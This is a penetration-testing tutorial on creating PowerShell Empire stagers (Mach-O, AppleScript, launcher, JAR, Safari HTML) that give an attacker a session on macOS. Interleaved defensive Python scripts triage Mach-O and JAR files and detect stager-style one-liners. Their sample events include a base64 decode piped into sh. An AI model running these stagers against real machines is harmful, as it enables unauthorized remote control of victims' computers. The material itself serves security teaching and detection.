Multiple Ways to Exploit OSX using PowerShell Empire
In this article, we will learn multiple ways to exploit OSX with PowerShell Empire. Empire provides various stagers for this purpose, and we will cover a few of them here. The method of attacking OSX is similar to that for Windows, which makes it a versatile approach for penetration testers. For a beginner's guide to pen-testing OSX, click here.
Table of Contents
- osx/macho
- osx/applescript
- osx/launcher
- osx/jar
- osx/safari_launcher
osx/macho
The first stager we will use is osx/macho. This stager creates a Mach-O file, the native executable format for binaries on OS X. The format was designed specifically for OS X, and its header and load commands tell the system in what order to map the file's code and data into memory. This makes the stager quite useful when attacking OS X.
The listener creation is the same as for Windows; use the HTTP listener. Once the listener is created, execute the following set of commands:
usestager osx/macho
set Listener http
set OutFile shell.macho
execute
Once shell.macho is executed on the victim's PC, you will have your session as shown in the image below:
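From the defender's side, a Mach-O file dropped on a host is triaged before anyone runs it. The following script is an added example (not code from the post or from Empire) that parses the Mach-O header and walks the load-command table, reporting the target architecture, file type, linked dylibs, entry-point command and whether an LC_CODE_SIGNATURE command is present. The bytes returned by build_sample() are a constructed header for illustration, not a real stager, and the small constant tables cover only the commonly seen values.

```python
"""Mach-O header triage (added example; constructed sample, not a real binary)."""
import struct

MH_MAGIC_64 = 0xFEEDFACF   # 64-bit little-endian Mach-O
MH_MAGIC = 0xFEEDFACE      # 32-bit little-endian Mach-O
FAT_MAGIC = 0xCAFEBABE     # universal (fat) container, big-endian magic

CPU_TYPES = {0x7: "i386", 0x01000007: "x86_64", 0x0100000C: "arm64"}
FILE_TYPES = {1: "MH_OBJECT", 2: "MH_EXECUTE", 6: "MH_DYLIB", 8: "MH_BUNDLE"}
LOAD_COMMANDS = {
    0x1: "LC_SEGMENT", 0x19: "LC_SEGMENT_64", 0xC: "LC_LOAD_DYLIB",
    0x5: "LC_UNIXTHREAD", 0x1D: "LC_CODE_SIGNATURE", 0x80000028: "LC_MAIN",
}
LC_LOAD_DYLIB, LC_MAIN, LC_CODE_SIGNATURE = 0xC, 0x80000028, 0x1D


def parse_macho(data: bytes) -> dict:
    """Return header facts and the load-command list without executing anything."""
    if struct.unpack(">I", data[:4])[0] == FAT_MAGIC:
        return {"format": "fat", "note": "universal binary; triage each slice"}
    magic = struct.unpack("<I", data[:4])[0]
    if magic == MH_MAGIC_64:
        hdr_len = 32            # 32-bit header plus a 4-byte reserved field
    elif magic == MH_MAGIC:
        hdr_len = 28
    else:
        raise ValueError("not a little-endian Mach-O: magic 0x%08x" % magic)
    _, cputype, _, filetype, ncmds, sizeofcmds, _ = struct.unpack("<7I", data[:28])

    cmds, off = [], hdr_len
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack("<II", data[off:off + 8])
        if cmdsize < 8 or off + cmdsize > len(data):
            raise ValueError("truncated or malformed load command at offset %d" % off)
        entry = {"cmd": LOAD_COMMANDS.get(cmd, "0x%x" % cmd), "size": cmdsize}
        if cmd == LC_LOAD_DYLIB:
            # dylib struct: lc_str name offset, timestamp, current/compat version
            name_off = struct.unpack("<I", data[off + 8:off + 12])[0]
            raw = data[off + name_off:off + cmdsize]
            entry["dylib"] = raw.split(b"\0", 1)[0].decode("ascii", "replace")
        elif cmd == LC_MAIN:
            entry["entryoff"] = struct.unpack("<Q", data[off + 8:off + 16])[0]
        cmds.append(entry)
        off += cmdsize
    if off - hdr_len != sizeofcmds:
        raise ValueError("sizeofcmds does not match the load commands walked")

    return {
        "format": "macho64" if hdr_len == 32 else "macho32",
        "cpu": CPU_TYPES.get(cputype, "0x%x" % cputype),
        "filetype": FILE_TYPES.get(filetype, str(filetype)),
        "code_signed": any(c["cmd"] == "LC_CODE_SIGNATURE" for c in cmds),
        "commands": cmds,
    }


def build_sample() -> bytes:
    """Constructed x86_64 MH_EXECUTE header with one dylib import and an LC_MAIN."""
    name = b"/usr/lib/libSystem.B.dylib\0"
    name += b"\0" * ((8 - len(name) % 8) % 8)          # load commands are 8-byte aligned
    dylib = struct.pack("<6I", LC_LOAD_DYLIB, 24 + len(name), 24, 2, 0, 0) + name
    main = struct.pack("<IIQQ", LC_MAIN, 24, 0x1000, 0)  # entryoff=0x1000, default stack
    header = struct.pack("<8I", MH_MAGIC_64, 0x01000007, 3, 2, 2,
                         len(dylib) + len(main), 0x200085, 0)
    return header + dylib + main


if __name__ == "__main__":
    for k, v in parse_macho(build_sample()).items():
        print(k, v)
```

A stager that is unsigned, links only libSystem and has an unusual LC_MAIN entry offset is a candidate for deeper static analysis; the parser deliberately refuses to continue when a load command runs past the end of the file, which is itself a common sign of a hand-built or corrupted binary.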
osx/applescript
The next stager we will use is osx/applescript. This stager generates AppleScript code; AppleScript is Mac's dedicated scripting language and gives automated control over scriptable Mac applications, which makes this an important stager for pen-testing Mac. To create the malicious AppleScript, run the following set of commands:
usestager osx/applescript
set Listener http
execute
Executing the above stager will generate a script; run that script on the targeted system as shown in the following image:
As soon as the code is executed on the victim's PC, you will have your session as shown in the image:
osx/launcher
The next stager we will use is osx/launcher. This is the most commonly used stager. To execute it, run the following commands:
usestager osx/launcher
execute
Copy the generated code and run it in the target system's shell. As soon as the code is executed, you will have your session as shown in the image below:
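Both the AppleScript and launcher stagers end up running interpreter one-liners on the host, so a defender's first detection is on process command lines. The script below is an added example (not code from the post or from Empire) that runs a few simple rules over constructed command-line events of the kind an endpoint agent or the unified log would record: an interpreter invoked with inline code that decodes base64, a base64 decode piped into a shell or interpreter, and osascript shelling out via "do shell script". The sample events and the rule names are assumptions made for this illustration.

```python
"""Command-line triage for interpreter-based stagers (added example)."""
import re

# Constructed process command-line events; the first two imitate stager-style
# one-liners, the last two are ordinary administrative activity.
SAMPLE_EVENTS = [
    'python -c "import sys,base64;exec(base64.b64decode(\'aW1wb3J0IG9z\'))"',
    'osascript -e \'do shell script "echo aGVsbG8= | base64 -D | sh"\'',
    "/usr/bin/python3 /Users/alice/tools/report.py --out /tmp/report.csv",
    "ls -la /Applications",
]

# (rule name, compiled pattern); names are assumptions for this example
RULES = [
    ("inline-base64-exec",
     re.compile(r"\b(python\d*|perl|ruby)\s+-c\s+.*base64", re.I)),
    ("decode-to-interpreter",
     re.compile(r"base64\s+(-D|-d|--decode)\b.*\|\s*(sh|bash|zsh|python\d*|perl)\b", re.I)),
    ("osascript-shell-out",
     re.compile(r"\bosascript\b.*do shell script", re.I)),
]


def classify(cmdline: str):
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(events):
    """Return (event, matched_rules) for each event that matched at least one rule."""
    hits = []
    for event in events:
        matched = classify(event)
        if matched:
            hits.append((event, matched))
    return hits


if __name__ == "__main__":
    for event, matched in triage(SAMPLE_EVENTS):
        print(", ".join(matched), "<-", event)
```

These rules are intentionally broad; in production they would be tuned against the host's baseline (for example, allow-listing known automation that legitimately calls osascript) and paired with the parent process, since a terminal spawned by a user and an interpreter spawned by a document viewer deserve very different responses.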
osx/jar
The next stager we will use is osx/jar. This stager creates a JAR file, a Java archive: a ZIP-based container that bundles compiled Java class files and resources together with a manifest, which the Java runtime can execute directly. Since Java is available on many Macs, this stager turns out to be a suitable one for attacking OS X. Use the following set of commands to execute the said stager:
usestager osx/jar
set Listener http
set OutFile out.jar
execute
The stager will create a JAR file as described above; the attacker executes that file on the victim's system, and you will have your session as shown in the image:
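A JAR found on a host can likewise be inspected without running it. The following is an added example (not code from the post or from Empire) that opens the archive with Python's zipfile module, reads the manifest to find the Main-Class that would run, checks whether the archive carries signature files under META-INF, verifies that each .class entry begins with the Java class-file magic and lists any non-class payloads packed alongside. The archive returned by build_sample_jar() is constructed in memory for the illustration; the class name and file names in it are assumptions.

```python
"""Static JAR triage (added example; constructed archive, not a real stager)."""
import io
import zipfile

MANIFEST = "META-INF/MANIFEST.MF"
CLASS_MAGIC = b"\xca\xfe\xba\xbe"
SIGNATURE_SUFFIXES = (".SF", ".RSA", ".DSA", ".EC")


def build_sample_jar() -> bytes:
    """Constructed runnable JAR: a manifest, one class stub and an opaque blob."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr(MANIFEST, "Manifest-Version: 1.0\r\n"
                             "Main-Class: com.example.Loader\r\n"
                             "Created-By: constructed sample\r\n\r\n")
        # class-file magic + minor/major version; the rest is filler
        z.writestr("com/example/Loader.class", CLASS_MAGIC + b"\x00\x00\x00\x34" + b"\0" * 16)
        z.writestr("payload.bin", b"\0" * 8)
    return buf.getvalue()


def parse_manifest(text: str) -> dict:
    """Parse the main section of a JAR manifest into a dict (continuation lines joined)."""
    attrs, last = {}, None
    for line in text.splitlines():
        if not line.strip():
            break                          # end of the main section
        if line.startswith(" ") and last:  # continuation of the previous attribute
            attrs[last] += line[1:]
        elif ":" in line:
            key, value = line.split(":", 1)
            last = key.strip()
            attrs[last] = value.strip()
    return attrs


def inspect_jar(data: bytes) -> dict:
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = [n for n in z.namelist() if not n.endswith("/")]
        manifest = parse_manifest(z.read(MANIFEST).decode("utf-8", "replace")) if MANIFEST in names else {}
        classes = [n for n in names if n.endswith(".class")]
        bad_magic = [n for n in classes if z.read(n)[:4] != CLASS_MAGIC]
        signed = any(n.startswith("META-INF/") and n.upper().endswith(SIGNATURE_SUFFIXES) for n in names)
        others = [n for n in names if n not in classes and not n.startswith("META-INF/")]
    return {
        "main_class": manifest.get("Main-Class"),   # None means not directly runnable
        "signed": signed,
        "class_count": len(classes),
        "bad_class_magic": bad_magic,
        "other_files": others,
    }


if __name__ == "__main__":
    for k, v in inspect_jar(build_sample_jar()).items():
        print(k, v)
```

An unsigned JAR with a Main-Class, a single class and an opaque blob beside it is exactly the shape a responder wants flagged for sandbox detonation rather than double-clicking; the manifest parser stops at the first blank line because per-entry sections follow the main section and are not needed for this check.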
osx/safari_launcher
The last stager we will use is osx/safari_launcher, which generates an HTML page for Safari. For this stager, run the following set of commands:
usestager osx/safari_launcher
set Listener http
execute
Open the generated page in Safari on the victim's PC, and you will have your session as shown in the image below:
To learn more about PowerShell, follow this link.
So, these were five ways to attack or pentest OS X. They are pretty easy and convenient, and each of them is valid and up to date.
Author: Sanjeet Kumar is an Information Security Analyst | Pentester | and Researcher. Contact Here